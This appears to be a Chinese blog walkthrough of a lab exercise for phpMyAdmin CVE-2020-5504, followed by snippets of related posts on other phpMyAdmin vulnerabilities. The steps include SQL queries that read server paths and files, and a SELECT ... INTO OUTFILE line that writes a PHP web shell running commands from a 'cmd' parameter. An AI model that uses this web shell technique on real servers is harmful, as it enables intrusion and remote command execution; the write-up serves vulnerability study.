phpmyadmin SQL注入 漏洞(CVE-2020-5504)

已于 2023-11-20 11:47:43 修改
阅读量610 收藏 2
点赞数 1
文章标签: sql 安全 数据库
于 2023-10-31 19:58:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy_wjyjw/article/details/134148007
版权
文章描述了一次针对PHPMyAdmin的SQL注入漏洞(CVE-2020-5504)的利用过程,攻击者通过IP地址利用已知路径和用户名密码登录,获取敏感信息并植入木马文件。
摘要由CSDN通过智能技术生成

phpmyadmin SQL注入 漏洞(CVE-2020-5504)

  • 访问IP地址(10.9.47.6:24643),发现错误

  • 根据镜像给的信息(后台路径和用户名密码)进行访问并登录

  • 登录成功进入后台,点击sql

  • 输入 select @@datadir(查询数据库的路径),点击go查看

  • 输入 select @@basedir(查询Mysql的安装路径)

  • 查看 select load_file('/var/www/html/pma/index.php'),点击go

  • 返回数据包3kib,一看就有东西所以网站绝对路径为/var/www/html/pma

  • 输入(select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php')构造木马

  • 使用传入的参数cmd传入值,获取flag

西柠!
关注
phpmyadmin SQL注入CVE-2020-5504
千寻的博客
03-07 1479
phpMyAdminphpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
phpmyadmin靶场
最新发布
wtl3333的博客
09-13 114
phpmyadmin靶场
phpmyadmin SQL注入(CVE-2020-5504)
m0_65150886的博客
02-26 698
Phpmyadmin <= 5.00和Phpmyadmin <= 4.94时,在用户帐户页面中存在一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。5.查看 SELECT load_file('/var/www/html/pma/index.php')所以网站绝对路径为/var/www/html/pma。1.访问http://ip:port,出现如下页面,开始实验。
漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504
10-12 3021
phpmyadmin-SQL注入】写马
[Vulfocus解题系列] phpmyadmin SQL注入CVE-2020-5504
00勇士王子的博客
10-01 3905
漏洞介绍 名称: phpmyadmin SQL注入CVE-2020-5504) 描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 解题过程 1.访问题目环境,因为这个漏洞phpmyadmin的后台漏洞,
phpmyadmin SQL注入CVE-2020-5504)复现
weixin_63124284的博客
10-26 2490
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
Phpmyadmin 后台sql注入漏洞CVE-2020-5504
jammny
11-29 2547
Phpmyadmin 后台sql注入漏洞CVE-2020-5504) 一、漏洞简介 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 二、漏洞影响 Phpmyadmin <= 5.00 Phpmyadmin <= 4.94 三、漏洞分析 https://xz.aliyun.com/t/7092 四、漏洞利用 登陆进入后台界面,将获取到的token值记下来。
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 2782
VULFOCUS CVE-2020-5504
PhpMyadminSQL注入(CVE-2020-0554)复现
玄道的网安博客
09-16 1957
简介 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。 影响版本 phpMyAdmin 4 < 4.9.4 phpMyAdmin 5 < 5.0.1 环境搭建 为了方便做事,这里我直接用把phpmyadmin文件拖入刀集成环境中 下载地址 https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm...
phpmyadmin SQL注入CVE-2020-5504) 复现
YouthBelief的博客
11-11 4227
phpmyadmin SQL注入CVE-2020-5504phpmyadmin SQL注入CVE-2020-5504)0x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞利用0x04 漏洞修复 phpmyadmin SQL注入CVE-2020-5504) 0x01 漏洞描述 phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞
vulfocus phpmyadmin SQL注入CVE-2020-5504
weixin_61913198的博客
10-19 483
描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。然后来到sql命令执行处可以直接执行sql命令,现在想要上传webshell需要找到网站绝对路径,常规思路让网站报错或者找phpinfo,找了一大圈没找到,这个时候就需要猜网站绝对路径了,还记得前面那个nginx嘛?访问http://ip/pma/index.php登陆,账号密码为admin 123456。
phpMyadmin各版本漏洞
aiquan9342的博客
10-04 1113
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG   概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞   利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 二: 影响版本:phpMyAdmin v3.5....
phpMyAdmin $_REQUEST参数发现SQL注入漏洞
phphot
04-07 1912
发布日期:2008-03-01更新日期:2008-03-04受影响系统:phpMyAdmin phpMyAdmin 不受影响系统:phpMyAdmin phpMyAdmin 2.11.5描述:BUGTRAQ ID: 28068phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQLphpMyAdmin使用$_REQUEST而不是$_GET和$_POST变量作为其参数来源,并且在SQ
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 1729
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库
PhpMyAdmin文件包含漏洞
weixin_43622525的博客
02-28 1769
目录 漏洞描述 漏洞复现 复现 解决方法 漏洞描述 PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。 在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含)漏洞。 受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613。 漏洞复现
PhpMyAdmin漏洞介绍
weixin_45253622的博客
03-19 3399
获取网站绝对路径,
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 595
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
更进一步,通过结合其他技术,如SQL注入或开启MySQL的`general_log`,攻击者可能能够实现远程代码执行(RCE),获取服务器的完全控制权。 解决方法: 修复此漏洞的关键在于更新到不受影响的PHPMyAdmin版本。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值